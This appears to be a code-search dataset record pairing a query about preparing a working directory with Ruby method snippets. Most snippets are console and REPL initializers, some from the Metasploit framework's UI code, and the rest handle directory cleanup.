"def start\n require File.dirname(__FILE__) + '/wirb/irb' if defined?(IRB)\n @running = true\n rescue LoadError\n warn \"Couldn't activate Wirb\"\n end",
"def initialize\n @viewport = Viewport.new(0,0,Graphics.width,Graphics.height)\n @viewport.z = 99999\n # Initialize shell options if not set\n $ShellOptions ||= ShellOptions.load\n # Get the active config. If none is found, use the default config.\n if !$ShellOptions.activeConfig || !$ShellOptions.shellConfigs.has_key?($ShellOptions.activeConfig)\n $ShellOptions.shellConfigs['default'] ||= ShellConfiguration.newDefault\n $ShellOptions.activeConfig = 'default'\n end\n @config = $ShellOptions.shellConfigs[$ShellOptions.activeConfig]\n # Create the console window and set the available commands.\n @window = ConsoleWindow.new(self,@viewport.rect)\n @prompt = @config.prompt\n @aliases = $ShellOptions.shellAliases\n @commands = {}\n self.set_commands\n @context = nil\n self.main\n end",
"def init\n require File.expand_path( '../irbtools.rb', File.dirname(__FILE__) )\n end",
"def initialize # :notnew:\n evaluate PRELUDE, PRELUDE_PATH, 1\n global.Johnson.runtime = self\n global['Ruby'] = Object\n evaluate CORE, CORE_PATH, 1\n end",
"def initialize\n @display = XlibObj::Display.new(':0')\n @root = Root.new(@display)\n @formatter = if ARGV.include?('--yambar')\n YambarFormatter.new\n else\n Formatter.new(Configuration.new)\n end\n end",
"def initialize(rstream)\n\t\tsuper\n\n\t\t#\n\t\t# Initialize the meterpreter client\n\t\t#\n\t\tself.init_meterpreter(rstream)\n\n\t\t#\n\t\t# Create the console instance\n\t\t#\n\t\tself.console = Rex::Post::Meterpreter::Ui::Console.new(self)\n\tend",
"def run\n src = ARGF.read\n exit 2 unless src\n\n interpreter = Expectr::Interpreter.new(src.untaint)\n interpreter.filename = $FILENAME\n interpreter.run\n end",
"def interactive_generator\n webGui = WebGui.new(\"\")\n webGui.start\nend",
"def initialize(bin_file = \"sqlplus\")\n @bin_file = bin_file\n @tail = \"\"\n @busy = false\n @start_marker, @end_marker, @cancel_marker = [2.chr, 3.chr, 4.chr]\n @process = ChildProcess.build(@bin_file, \"/nolog\")\n # On Unix we may abort the currently executing query by sending a\n # INT signal to the Sqlplus process, but we need access to the \n # send_term private method.\n class << @process; public :send_signal; end if ChildProcess.unix?\n @process.duplex = true\n @process.detach = true\n @process.io.inherit!\n @io_read, @io_write = VoraxIO.pipe\n @process.io.stdout = @io_write\n @process.start\n @process.io.stdin.sync = true\n @current_funnel = nil\n @default_convertor_name = nil\n @registered_convertors = {:vertical => Output::VerticalConvertor,\n :pagezip => Output::PagezipConvertor,\n :tablezip => Output::TablezipConvertor}\n # warm up\n sleep 0.2\n # set the blockterm as the end_marker. The blockterm should\n # not be touch by the Vorax user, otherwise nasty things\n # may happen. This is also a workaround to mark the end of\n # output when the \"echo\" setting of sqlplus is \"on\". See the\n # implementation of pack().\n send_text(\"\\n#set blockterm \\\"#@end_marker\\\"\\n\")\n end",
"def start\n parse!\n run\n end",
"def initialize(arguments, gdb: 'gdb')\n gdb_bin = ::GDB::Util.which(gdb)\n raise Errno::ENOENT, gdb if gdb_bin.nil?\n\n arguments = \"--command=#{File.join(SCRIPTS_PATH, 'gdbinit.py')} #{arguments}\" # XXX\n @tube = spawn(\"#{gdb_bin} #{arguments}\")\n pre = @tube.readuntil('GDBRuby:')\n @prompt = @tube.readuntil(\"\\n\").strip\n @tube.unget(pre + @tube.readuntil(@prompt))\n end",
"def initialize(prompt = DefaultPrompt, prompt_char = DefaultPromptChar, opts = {})\n\n\t\t# Choose a readline library before calling the parent\n\t\trl = false\n\t\trl_err = nil\n\t\tbegin\n\t\t\tif(opts['RealReadline'])\n\t\t\t\trequire 'readline'\n\t\t\t\trl = true\n\t\t\tend\n\t\trescue ::LoadError\n\t\t\trl_err = $!\n\t\tend\n\n\t\t# Default to the RbReadline wrapper\n\t\trequire 'readline_compatible' if(not rl)\n\n\t\thistfile = opts['HistFile'] || Msf::Config.history_file\n\n\t\t# Call the parent\n\t\tsuper(prompt, prompt_char, histfile)\n\n\t\t# Temporarily disable output\n\t\tself.disable_output = true\n\n\t\t# Load pre-configuration\n\t\tload_preconfig\n\n\t\t# Initialize attributes\n\t\tself.framework = opts['Framework'] || Msf::Simple::Framework.create\n\n\t\t# Initialize the user interface to use a different input and output\n\t\t# handle if one is supplied\n\t\tif (opts['LocalInput'] or opts['LocalOutput'])\n\t\t\tinit_ui( opts['LocalInput'], opts['LocalOutput'])\n\t\telse\n\t\t\tinit_ui(Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new)\n\t\tend\n\t\tinit_tab_complete\n\n\t\t# Add the core command dispatcher as the root of the dispatcher\n\t\t# stack\n\t\tenstack_dispatcher(CommandDispatcher::Core)\n\n\t\t# Report readline error if there was one..\n\t\tif not rl_err.nil?\n\t\t\tprint_error(\"***\")\n\t\t\tprint_error(\"* WARNING: Unable to load readline: #{rl_err}\")\n\t\t\tprint_error(\"* Falling back to RbReadLine\")\n\t\t\tprint_error(\"***\")\n\t\tend\n\n\t\t# Add the database dispatcher if it is usable\n\t\tif(framework.db.usable)\n\t\t\trequire 'msf/ui/console/command_dispatcher/db'\n\t\t\tenstack_dispatcher(CommandDispatcher::Db)\n\t\telse\n\t\t\tprint_error(\"***\")\n\t\t\tprint_error(\"* WARNING: No database support: #{framework.db.error.class} #{framework.db.error}\")\n\t\t\tprint_error(\"***\")\n\t\tend\n\n\n\t\tbegin\n\t\t\trequire 'openssl'\n\t\trescue ::LoadError\n\t\t\tprint_error(\"***\")\n\t\t\tprint_error(\"* WARNING: No OpenSSL support. This is required by meterpreter payloads and many exploits\")\n\t\t\tprint_error(\"* Please install the ruby-openssl package (apt-get install libopenssl-ruby on Debian/Ubuntu\")\n\t\t\tprint_error(\"***\")\n\t\tend\n\n\t\t# Register event handlers\n\t\tregister_event_handlers\n\n\t\t# Load console-specific configuration\n\t\tload_config(opts['Config'])\n\n\t\t# Re-enable output\n\t\tself.disable_output = false\n\n\t\t# Load additional modules as necessary\n\t\tself.framework.modules.add_module_path(opts['ModulePath'], false) if opts['ModulePath']\n\n\t\t# Whether or not command passthru should be allowed\n\t\tself.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true\n\n\t\t# Disables \"dangerous\" functionality of the console\n\t\t@defanged = opts['Defanged'] == true\n\n\t\t# If we're defanged, then command passthru should be disabled\n\t\tif @defanged\n\t\t\tself.command_passthru = false\n\t\tend\n\n\t\t# Process things before we actually display the prompt and get rocking\n\t\ton_startup\n\n\t\t# Process the resource script\n\t\tif opts['Resource'] and opts['Resource'].kind_of? Array\n\t\t\topts['Resource'].each { |r|\n\t\t\t\tload_resource(r)\n\t\t\t}\n\t\telse\n\t\t\t# If the opt is nil here, we load ~/.msf3/msfconsole.rc\n\t\t\tload_resource(opts['Resource'])\n\t\tend\n\tend",
"def open_session(iter)\n Msf::Ui::Gtk2::Console::Shell.new(iter)\n end",
"def initialize(exe, output, user_input=nil)\n @output = output\n @prompted = false\n @faulted = false\n @user_input = user_input\n @found_search = false\n @pending_expression = nil\n listen exe\n end",
"def start_run; end",
"def initialize(settings={})\n @breakpoint = nil\n @settings = Trepanning::DEFAULT_SETTINGS.merge(settings)\n @input ||= @settings[:input]\n @output ||= @settings[:output]\n\n @processor = CmdProcessor.new(self)\n\n @intf = [Trepan::UserInterface.new(@input, @output)]\n @settings[:cmdfiles].each do |cmdfile|\n add_command_file(cmdfile)\n end if @settings.member?(:cmdfiles)\n Dir.chdir(@settings[:initial_dir]) if @settings[:initial_dir]\n @restart_argv = @settings[:restart_argv]\n\n ## FIXME: put in fn\n @processor.dbgr = self\n ## m = Rubinius::Loader.method(:debugger).executable.inspect\n meth = Rubinius::VM.backtrace(0)[0].method\n @processor.ignore_methods[meth] = 'next'\n @processor.ignore_methods[method(:debugger)] = 'step'\n\n @thread = nil\n @frames = []\n ## FIXME: Delete these and use the ones in processor/default instead.\n @variables = {\n :show_bytecode => false,\n :highlight => false\n }\n\n @loaded_hook = proc { |file|\n check_deferred_breakpoints\n }\n\n @added_hook = proc { |mod, name, exec|\n check_deferred_breakpoints\n }\n\n # Use a few Rubinius specific hooks to trigger checking\n # for deferred breakpoints.\n\n Rubinius::CodeLoader.loaded_hook.add @loaded_hook\n Rubinius.add_method_hook.add @added_hook\n\n @deferred_breakpoints = []\n\n @history_path = File.expand_path(\"~/.trepanx\")\n\n if File.exists?(@history_path)\n File.readlines(@history_path).each do |line|\n Readline::HISTORY << line.strip\n end\n @history_io = File.new(@history_path, \"a\")\n else\n @history_io = File.new(@history_path, \"w\")\n end\n\n @history_io.sync = true\n\n @root_dir = ROOT_DIR\n\n # Run user debugger command startup files.\n add_startup_files unless @settings[:nx]\n add_command_file(@settings[:restore_profile]) if \n @settings[:restore_profile] && File.readable?(@settings[:restore_profile])\n end",
"def initialize(opts = {})\n @host = opts[:host] || @@rserve[:host] || DEF_RSERVE_HOST\n @port = opts[:port] || @@rserve[:port] || DEF_RSERVE_PORT\n @connection_state = :unknown\n\n @is_processing = false\n @last_eval_line = nil\n\n @process_queue = []\n @version = nil\n @version_cbk = nil\n\n si = File.read(File.join(File.dirname(__FILE__), 'session_init.R'))\n eval(si) do |state, msg|\n if state == :ok\n @version = msg.to_ruby\n @version_cbk.call(version) if @version_cbk\n @version_cbk = nil\n #puts \"IIINIT> #{@version}\"\n else\n error \"Couldn't initialize RServe - #{msg}\"\n end\n end\n\n debug \"Attempting to connect to Rserve\"\n EventMachine::connect @host, @port, RServConnection do |c|\n @connection = c\n @protocol = Protocol.new(c)\n c.on_new_state do |state|\n debug \"Connection state: \", state\n @connection_state = state\n _process_queue\n end\n end\n end",
"def execute_command\n begin\n if @cgi.has_key?('type') then\n doc = REXML::Document.new\n command = doc.add_element 'COMMAND'\n @cgi.params.each_pair { |key,value| command.attributes[key]=value}\n xmlCommand = doc.to_s\n socket = TCPSocket.new(@host,@port)\n socket.puts xmlCommand \n xmlResult = socket.gets.chop\n docResult = REXML::Document.new xmlResult\n end\n rescue\n puts 'Probleem bij uitvoeren commando'\n exit\n end\n end",
"def setup()\n @strm = IO::popen(\"#{@commandPath} #{@commandOpts}\",'r+') ;\n call(\"display2d:false;\")\n call(\"linel:1000000000;\")\n end",
"def cmd_irb(*args)\n expressions = []\n\n # Parse the command options\n @@irb_opts.parse(args) do |opt, idx, val|\n case opt\n when '-e'\n expressions << val\n when '-h'\n return cmd_irb_help\n end\n end\n\n session = client\n framework = client.framework\n\n if expressions.empty?\n print_status(\"Starting IRB shell\")\n print_status(\"The 'client' variable holds the hwbridge client\\n\")\n\n Rex::Ui::Text::IrbShell.new(binding).run\n else\n expressions.each { |expression| eval(expression, binding) }\n end\n end",
"def program() @program end",
"def open_irb(options, argv)\n tm_lib = File.dirname(__FILE__) + '/../../../ticketmaster.rb'\n irb_name = RUBY_PLATFORM =~ /mswin32/ ? 'irb.bat' : 'irb' \n requires = \"-r rubygems -r #{tm_lib} \"\n cmd = ''\n if File.exist?(config = File.expand_path(options[:config]))\n ENV['TICKETMASTER_CONFIG']=config\n end\n providers = !options[:provider].nil? ? [options[:provider]] : YAML.load_file(config).keys\n providers.delete 'default'\n require 'rubygems'\n require 'ticketmaster'\n providers.inject(requires) do |mem, p|\n begin\n require \"ticketmaster-#{p}\"\n requires << \"-r ticketmaster-#{p} \"\n rescue Exception => exception\n #puts exception\n begin\n require \"#{p}\"\n requires << \"-r #{p} \"\n rescue Exception => exception\n warn \"Could not require the '#{p}' provider. Is it installed?\"\n end\n end\n end\n cmd << \"#{irb_name} #{requires} --simple-prompt #{ARGV.join(' ')}\"\n exec cmd\nend",
"def console; end",
"def console; end",
"def start(options={},&block)\n @stdout = options[:stdout] || $stdout\n @stderr = options[:stdout] || @stdout\n @stdin = options[:stdin] || $stdin\n while line = @stdin == $stdin ? Readline.readline(\"> \", true) : @stdin.gets \n line.strip!\n next if line.length==0\n parse_tree_node = parser.parse line\n if parse_tree_node\n evaluate parse_tree_node, &block\n else\n errputs parser.parser_failure_info :verbose => true\n end\n end\n end",
"def initialize\n @console = CLI::Console.new(HighLine.new)\n @vending_machine = VendingMachine.new\n @money_in_progress = []\n end",
"def initialize path = \"#{Dir.tmpdir}/live-rb\" \n raise Exception.new(\"Another session sems to be running: #{path}\") if File.exist? path\n puts Notice.new(\"Live Session: #{path}\")\n\n %x{mkfifo #{path}}\n @pipe, @path, @key_bindings = File.open(path, 'r+'), path, {}\n\n begin\n new_context and key_listen and run!\n ensure\n File.delete(path) if File.exists? path\n end\n end",
"def run\n if @options[:standalone]\n puts get_compile_command\n output_watcher = OutputWatcher.new(\"mxmlc \" + get_compile_command)\n output_watcher.stdout.each_line do |line|\n puts \" -->\\t\" + line\n end\n \n output = output_watcher.stderr\n errors = MxmlcOutputReader.new(output)\n \n @report = HtmlMxmlcErrorFormatter.new(errors)\n write_report!\n open_browser\n \n else\n output = run_mxmlc\n errors = @fcsh.errors\n \n message = \"Complete: %d errors, %d warnings\" % [errors.errors.size, errors.warnings.size]\n puts message\n error_array = errors.messages.map {|x| {\"filename\" => x.filename, \"line\" => x.line, \"level\" => x.level, \"message\" => x.message, \"content\" => x.content, \"column\" => x.column } }\n @server.send JSON.generate(error_array)\n @growl.notify \"ruby-growl Notification\", \"Textmate FCSH\", message\n end\n \n\n \n end",
"def wake_bixsby\n # Initiate new ProgramB instance\n # Load in properties and add new AIML node to ProgramB\n bixsby_print \"Loading ProgramB version #{Programb::VERSION}\"\n @bixsby = Programb::Kernel.new(\"./config/properties.yml\")\n @bixsby.parser[\"bixsby\"] = @bixsby.method(:process_bixsby)\n\n # Load modules and AIML\n # Loads the guts for Bixsby\n load_modules\n load_aiml\n\n # Start loop for server commands\n @console = Console.new\n\n bixsby_print \"Good day sir, I am up and running.\\nType '\\\\h' to see a list of my commands.\"\n\n # Main loop\n # Listens for connections and initates a new thread for the client.\n loop {\n Thread.start(@server.accept) do |client|\n session_id = set_session\n \n bixsby_print \"Established new connection: #{Time.now.to_s}, session_id: #{session_id}, client: #{client.peeraddr.last}\"\n \n @connections[:clients][session_id] = client\n \n greeting_msg = @bixsby.respond(\"Hello\")\n formatted_response = package_response(session_id, greeting_msg)\n\n client.puts(formatted_response)\n bixsby_listen(client)\n end\n }\n end",
"def create_repl\n @pry_fiber = Fiber.new do\n loop do\n @input = Input.new\n @output = Output.new\n\n Pry.start(@object, :input => @input, :output => @output)\n end\n end\n\n handle_fiber # wait until we're asked for the first line of input\n end",
"def initialize\n @map = nil\n @turn_number = 0\n\n @did_setup = false\n\n @stdin = if File.exists?('debugger_input')\n STDERR.puts \"Using debugger input!\"\n File.open('debugger_input')\n else\n STDIN\n end\n\n @stdout = STDOUT\n end",
"def _init(explaination='no explaination given', initial_debug_state = $DEBUG_INIT)\n $RELOAD_DEBUG = false # \n deb \"pre init '#{explaination}'\" if $RELOAD_DEBUG\n $INIT_DEBUG = false # dice se debuggare la mia intera infrastruttura o no...\n $RELOADED_ONCE = 0 # aiuta a capuire quante volte includo sta cazo di lib! Sempre 2!!!\n $RIC_LIB_MODULES = %w{ classes/debug_ric } # to be explicitly included in this order.\n $HOME = File.expand_path('~')\n $DEBUG ||= initial_debug_state \n $PROG = File.basename($0)\n case $PROG\n when 'irb'\n print \"[DEB] Welcome to Sakura within IRB! Happy playing. Try 'Sakuric.VERSION'\"\n when 'ruby'\n print \"[DEB] Welcome to Sakura within RUBY! Happy playing. Try 'Sakuric.VERSION'\"\n default\n # do nothing\n end\n \n ################################################################################\t\n # Path to riccardo's Library... Library stuff\n $LOAD_PATH << './lib' \n $LOAD_PATH << \"#{$SAKURADIR}/lib/\"\n\n # BEWARE: ORDER *IS* RELEVANT!\n $RICLIB = Hash.new unless defined?($RICLIB)\n $RICLIB['VERSION'] = $RICLIB_VERSION\n $RICLIB['libs'] ||= []\n $RICLIB['nreloaded'] ||= 0\n $RICLIB['nreloaded'] += 1 \n $RICLIB['help'] =<<-BURIDONE\nThis library contains all my enciclopedic knowledge (that is, notionistic). :\nFinally solved the bug of double inclusion (crisbio, files included this!)\nBURIDONE\n\n load_sakura_modules!(initial_debug_state)\n $CONF = RicConf.new()\n pyellow($CONF.info()) if debug?() \n puts \"post init delle #{Time.now}\" if $RELOAD_DEBUG\n print \"Sakuric.n_called(): #{ Sakuric.n_called() }\"\nend",
"def initialize\n @console = Console.new\n end",
"def reload\n msg = '# Reloading the console...'\n puts CodeRay.scan(msg, :ruby).term\n Pry.save_history\n exec(\"./#{__FILE__}\")\nend",
"def start_cli\n puts hello\n quit = false\n while not quit\n line = gets.strip!\n\n quit = true if line == 'quit'\n action = take_cmd(@cli_cmds, line, @jid)\n unless quit\n output = action.call\n puts output unless output.nil?\n end\n end\n end",
"def initialize(interpreter)\n @app = interpreter\n @state = :ready\n @state_arg = nil\n end",
"def command_start; end",
"def command_start; end",
"def command_start; end",
"def reload\n reload_msg = '# Reloading the console...'\n files = $LOADED_FEATURES.select { |feat| feat =~ /\\/croesus\\// }\n files.each { |file| load file }\n puts CodeRay.scan(reload_msg, :ruby).term\n exec($0)\nend",
"def irb(*args, &blk)\n __shell 'irb', *args, &blk\n end",
"def initialize(iter)\n # Style\n console_style = File.join(driver.resource_directory, 'style', 'console.rc')\n Gtk::RC.parse(console_style)\n\n # Call the parent\n super(Gtk::Window::TOPLEVEL)\n\n # initialize the session var from the iter sessions tree\n @session = iter[O_SESSION]\n\n # Layout stuff\n self.set_default_size(500, 400)\n self.set_border_width(10)\n\n # Set title with the tunnel peer\n self.set_title(@session.tunnel_peer)\n\n # Add a vertical box to the window\n vbox = Gtk::VBox.new(false, 5)\n self.add(vbox)\n\n # Setup text view and buffer\n @textview = Gtk::TextView.new\n if iter[O_BUFFER].nil?\n @buffer = Gtk::TextBuffer.new\n iter[O_BUFFER] = @buffer\n else\n @buffer = iter[O_BUFFER]\n end\n scrolled_window = Gtk::ScrolledWindow.new\n scrolled_window.add(@textview)\n vbox.pack_start(scrolled_window, true, true, 5)\n scrolled_window.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)\n\n # Setup text buffer\n @textview.set_buffer(@buffer)\n @textview.editable = true\n @textview.set_cursor_visible(true)\n @buffer.create_mark('end_mark', @buffer.end_iter, false)\n\n # Setup button close\n hbox = Gtk::HButtonBox.new\n hbox.layout_style = Gtk::ButtonBox::END\n @button_close = Gtk::Button.new(Gtk::Stock::CLOSE)\n\n # Pack\n hbox.pack_end(@button_close, false, false, 5)\n vbox.pack_start(hbox, false, false, 0)\n\n # Signal for the Return key pressed\n signal_connect('key_press_event') do |edit, event|\n on_key_pressed(event)\n end\n\n # Create the pipe interface\n @pipe = Rex::IO::BidirectionalPipe.new\n\n # Start the session interaction\n @t_run = Thread.new do\n @session.interact(@pipe, @pipe)\n end\n\n # Create a subscriber with a callback for the UI\n @sid = @pipe.create_subscriber_proc() do |data|\n insert_text(Rex::Text.to_utf8(data))\n end\n\n # Init an history object\n @historic = History.new()\n\n # Init the prompt variable with the session type\n @type = @session.type\n\n # Display all\n self.show_all\n\n end",
"def console=(_arg0); end",
"def console=(_arg0); end",
"def raw_cib\n @raw_cib = cibadmin '-Q'\n if @raw_cib == '' or not @raw_cib\n fail 'Could not dump CIB XML using \"cibadmin -Q\" command!'\n end\n @raw_cib\n end",
"def init_iruby\n @adapter.init_iruby\n end",
"def record_shell_interaction(commands)\n ShellSimulator.new(commands).capture_output do\n load VIRTUAL_SHELL_PROGRAM\n end\nend",
"def run_irb close_operation = JFrame::HIDE_ON_CLOSE # DISPOSE_ON_CLOSE ?\n STDERR.puts \"RubyConsole run_irb called\"\n text = javax.swing.JTextPane.new\n text.font = RubyConsole.find_font 'Monospaced', Font::PLAIN, 14, 'Menlo', 'Monaco', 'Andale Mono'\n text.margin = java.awt.Insets.new(8, 8, 8, 8)\n text.caret_color = Color.new(0xa4, 0x00, 0x00)\n text.background = Color.new(0xf2, 0xf2, 0xf2)\n text.foreground = Color.new(0xa4, 0x00, 0x00)\n\n @irb_pane = javax.swing.JScrollPane.new\n @irb_pane.viewport_view = text\n\n @file_button = javax.swing.JButton.new \"Load file\"\n\n pane = javax.swing.JPanel.new java.awt.GridBagLayout.new\n pane.add(@irb_pane, AwtUtil.getConstraints(0, 0, 1, 1, 4, 1, true, true))\n pane.add(@file_button, AwtUtil.getConstraints(0, 3, 1, 0, 1, 1, false, true))\n\n# enableEvents(WindowEvent.WINDOW_CLOSING);\n @file_button.addActionListener(self)\n\n @frame = JFrame.new \"Moneydance Interactive JRuby #{JRUBY_VERSION} Console \" +\n \"(tab will autocomplete)\"\n @frame.default_close_operation = close_operation\n @frame.set_size 800, 800\n @frame.content_pane.add pane # @frame.add pane\n\n header = \" MD - Moneydance context: ComMoneydanceAppsMdController::Main \\n\" +\n \" ROOT - Moneydance root account: ComMoneydanceAppsMdModel::RootAccount \\n\" +\n \" TRANS - Moneydance TransactionSet: ComMoneydanceAppsMdModel::TransactionSet \\n\\n\"\n\n readline = org.jruby.demo.TextAreaReadline.new text, header\n JRuby.objectspace = true # useful for code completion\n readline.hook_into_runtime_with_streams(JRuby.runtime)\n\n EventQueue.invoke_later proc { show }\n\n ARGV << '--readline' << '--prompt' << 'inf-ruby'\n IRB.start(__FILE__)\n @ruby_main.cleanup\n end",
"def initialize(shell)\n\t\tsuper\n\tend",
"def start_server\n erl = CliRunner.open 'skirmish_server', 'erl', /\\d>/, /Eshell/\n erl << \"code:add_path(\\\"#{server_dir}/ebin\\\").\" >> /true/\n erl << \"application:start(skirmish_server).\" >> /ok/\n @automation_server = erl\n log.info(\"Automation#start_server\") { \"server started\" }\n end",
"def setup_context\n self['console'] = Console.new\n load RUNTIME_PATH\n\n opal = self['opal']\n opal['loader'] = Loader.new opal, self\n opal['fs'] = FileSystem.new opal, self\n opal['platform']['engine'] = 'opal-gem'\n\n # eval \"opal.require('core');\", \"(opal)\"\n require_file 'core'\n end",
"def initialize\n begin\n require 'readline'\n @have_readline = true\n @history_save = true\n rescue LoadError, ArgumentError\n @have_readline = false\n @history_save = false\n end\n end",
"def setup_drb_objects\n require 'nitro/session/drb'\n @session_cache = SyncHash.new \n DRb.start_service(\"druby://#{Session.cache_address}:#{Session.cache_port}\", @session_cache) \n puts \"Drb session cache at druby://#{Session.cache_address}:#{Session.cache_port}.\"\n end",
"def init # entry method to the CLI \n greeting \n menu_list\n menu_selection\nend",
"def initialize(args = ARGV)\n @options, *_paths = Options.new.parse(args)\n @term = Terminal.new(debug: @options[:debug])\n @cached_processors = {}\n # TODO: Set timezone according to remote IP.\n Time.zone = 'Asia/Seoul'\n end",
"def initialize(config)\n STDOUT.sync = true\n \n super()\n \n puts \"Console (ec2x-agent #{Ec2x::Config.version})\"\n\n @config = config\n @delegator = Ec2x::CommandDelegator.new(@config)\n end",
"def execute *args\n self.executable = :amxmlc\n super\n end",
"def exec; end",
"def exec; end",
"def initialize\r\n puts 'Welcome to the class browser program.'\r\n @input = ''\r\n\r\n end",
"def initialize(command_line)\n parse(command_line)\n end",
"def initialize\n @prompt = TTY::Prompt.new\n end",
"def start_drb_server\r\n drb_server = DRb.start_service(\r\n \"druby://#{@drb_server_host}:#{@drb_server_port}\")\r\n @drb_server_uri = drb_server.uri\r\n @log.info(\"Watir Grid started on : #{@drb_server_uri}\")\r\n end",
"def init\n @calls = []\n @accept_nodes = []\n @connected_nodes = nil\n @remote_bash_code = nil\n end",
"def initialize( prompt = false )\n\n\t\t@prompt = prompt\n\t\t\n\t\t# This string is only assigned when a quick command created via an \n\t\t# instance of Command. More through \n\t\t@code = yield if block_given?\n\n\tend"
] |
[
"0.65019333",
"0.64288914",
"0.6155321",
"0.60915166",
"0.60181373",
"0.59680706",
"0.59327716",
"0.59311205",
"0.58957195",
"0.58705044",
"0.5767094",
"0.575434",
"0.5736025",
"0.5735212",
"0.5720628",
"0.56802",
"0.5676554",
"0.56409335",
"0.56183326",
"0.5579454",
"0.55589616",
"0.5504897",
"0.54979324",
"0.5496175",
"0.5493404",
"0.54918855",
"0.54744095",
"0.5467938",
"0.54539317",
"0.54527193",
"0.545138",
"0.54387283",
"0.5421928",
"0.54047847",
"0.5402103",
"0.5397482",
"0.53918463",
"0.5387356",
"0.5379707",
"0.5377374",
"0.537558",
"0.53724384",
"0.53716224",
"0.5371299",
"0.537002",
"0.53692806",
"0.53652954",
"0.5356997",
"0.5342589",
"0.53422743",
"0.5319434",
"0.5309576",
"0.5308898",
"0.5302462",
"0.52997845",
"0.5299389",
"0.529219",
"0.52854824",
"0.52854824",
"0.52750796",
"0.5249132",
"0.5247055",
"0.52433753",
"0.5240892",
"0.522188",
"0.5207923",
"0.52061456",
"0.52029115",
"0.52029",
"0.5199177",
"0.518809",
"0.5184941",
"0.5184941",
"0.5184941",
"0.5179138",
"0.5162527",
"0.5156738",
"0.51558757",
"0.51558757",
"0.51518726",
"0.51472807",
"0.5122639",
"0.511081",
"0.51022124",
"0.51019484",
"0.5101752",
"0.51012063",
"0.50943714",
"0.50930023",
"0.5089698",
"0.5089108",
"0.5079886",
"0.5076773",
"0.5076773",
"0.5071118",
"0.50591666",
"0.505506",
"0.50417155",
"0.5040898",
"0.504006"
] |
0.77239615
|
0
|
If the working dir doesn't exist, make it and if it does exist, clean it out
|
def prepare_working_dir
FileUtils.mkdir_p @working_dir unless File.directory?(@working_dir)
FileUtils.rm_rf Dir["#{@working_dir}/*"] if @force_rebuild
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def clean_up\n FileUtils.rm_rf \"#{@path}\" unless create_in_current_directory?\n FileUtils.rm_rf \"#{@cache}\"\n end",
"def clean_dir\n\n path = self.get_dir\n _clean_dir(path)\n end",
"def clean_dir\n File.join clean_dir_parent, name\n end",
"def clean\n needs_cleaning = File.exist?(project_dir)\n if needs_cleaning\n log.info(log_key) { \"Cleaning project directory `#{project_dir}'\" }\n FileUtils.rm_rf(project_dir)\n end\n create_required_directories\n deploy\n needs_cleaning\n end",
"def clean_up\n Dir.foreach(Dir.pwd) do |f|\n if !f.start_with?('tmp_') then next\n elsif File.directory?(f) then FileUtils.rm_rf(f)\n else FileUtils.rm(f)\n end\n end\nend",
"def clean_up\n FileUtils.rm_rf @temp_root\n end",
"def cleanup\n if Dir.exists?(WORKFOLDER)\n FileUtils.remove_dir(WORKFOLDER)\n print_status(\"Workspace \\\"#{WORKFOLDER}\\\" deleted.\")\n end\nend",
"def clean_paths\n FileUtils.rm_rf(tmp_path)\n FileUtils.mkdir_p(tmp_path)\n end",
"def clean\n #rm_r(srcdir)\n rm_r(blddir)\n #rm_r(libdir)\n end",
"def cleanup\n FileUtils.rm(@out_filename)\n\n # XXX: could be rm-rf, but be safe for now. Might have\n # problems if app creates files in $PWD\n FileUtils.rmdir(@opts[:tmpdir])\n end",
"def clean!\n FileUtils.rm_rf(dir)\n end",
"def clean_test_dir!\n FileUtils.remove_entry_secure test_dir\n end",
"def reset_dir(pathname)\n\tputs \" Deleting and recreating #{pathname} folder\"\n\tFileUtils.rm_rf(pathname) unless not Dir.exist?(pathname)\n\tDir.mkdir(pathname)\nend",
"def cleanup\n tmpdir = File.join(OBS_BUILD_DIR,OBS_LOCAL_TMP)\n if File.exists?(tmpdir)\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def make_output_dir (src_path)\n delete_all_files(src_path) if directory_exists?(src_path) == true\n Dir.mkdir(src_path)\nend",
"def clean!\n stop\n FileUtils.remove_entry(download_path) if File.exists? download_path\n FileUtils.remove_entry(tmp_save_dir, true) if File.exists? tmp_save_dir\n FileUtils.remove_entry(instance_dir, true) if File.exists? instance_dir\n FileUtils.remove_entry(md5sum_path) if File.exists? md5sum_path\n FileUtils.remove_entry(version_file) if File.exists? version_file\n end",
"def clean!\n stop\n FileUtils.remove_entry(download_path) if File.exists? download_path\n FileUtils.remove_entry(tmp_save_dir, true) if File.exists? tmp_save_dir\n FileUtils.remove_entry(instance_dir, true) if File.exists? instance_dir\n FileUtils.remove_entry(md5sum_path) if File.exists? md5sum_path\n FileUtils.remove_entry(version_file) if File.exists? version_file\n end",
"def make_work_folder_if_empty\n unless Dir.exists?(WORKFOLDER)\n FileUtils.mkdir_p(WORKFOLDER)\n print_status(\"Workspace \\\"#{WORKFOLDER}\\\" created\")\n end\nend",
"def destroy!\n fail \"Can not destroy a running stone\" if running?\n rm_rf system_config_filename\n rm_rf extent_directory\n rm_rf log_directory\n rm_rf tranlog_directories\n end",
"def destroy\n FileUtils.rm_rf(@working_dir)\n end",
"def clean_wiki_folders\n puts \"Trying to clean the wiki\"\n if File.exist?(g('wiki_dest'))\n #puts \"Removing Folder \"+g('wiki_dest')\n removeFolder(\"\") \n end\n #puts \"Creating Folder \"+g('wiki_dest')\n FileUtils.mkdir(g('wiki_dest'))\nend",
"def purge\n\n FileUtils.remove_dir(@basepath)\n end",
"def ensure_directory_exists\r\n dir = File.dirname(full_path_from_current_attributes)\r\n FileUtils.mkdir_p(dir) unless File.exists?(dir)\r\n end",
"def prep_build\n stdout.out_success(\"\\nPreparing build dir at: '#{settings['build_dir']}'\")\n stdout.verbose(\"Removing build dir at: #{settings['build_dir']}\")\n FileUtils.rm_rf(settings['build_dir'])\n # create the build dir\n stdout.verbose(\"Creating build dir at: #{settings['build_dir']}\")\n FileUtils.mkdir(settings['build_dir'])\n end",
"def remove_dirs()\n puts \"Removing test directories...\"\n \n if File::exist?(\"tmp\") && File::directory?(\"tmp\")\n FileUtils.rm_rf(\"tmp\") \n end\n exit 0\nend",
